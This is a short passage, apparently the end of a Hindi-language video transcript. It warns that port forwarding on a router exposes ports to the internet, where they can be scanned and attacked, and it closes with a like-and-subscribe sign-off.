फॉरवर्ड करते हैं अपने राउटर में जाके, तो आप अपने पोर्ट को एक्सपोज कर रहे हैं ओवर द इंटरनेट, ठीक है। तो कोई भी अगर आपकी IP एड्रेस के थ्रू आपको पहुंचना चाहेगा आपसे, तो वो इजीली पहुंच सकता है, ठीक है। तो उसका आपको पब्लिक IP एड्रेस चाहिए होगा, आपके पोर्ट को वो स्कैन वगैरह कर सकता है। और अगर मान लो आप वेब सर्वर आपका या कोई और सेंसिटिव पोर्ट आप गलती से ऑनलाइन डाल देते हो, तो उसमें आपके अटैक होने के चांसेस बढ़ जाते हैं। सो बी अवेयर ऑफ दैट। तो अगर वीडियो पसंद आई हो तो उसे लाइक मारो, कोई चीज़ समझ नहीं आई तो आइदर कमेंट हियर एंड ऑल्सो सब्सक्राइब टू दिस चैनल। मैं मिलता हूँ आपको अगली वीडियो में, बाय बाय।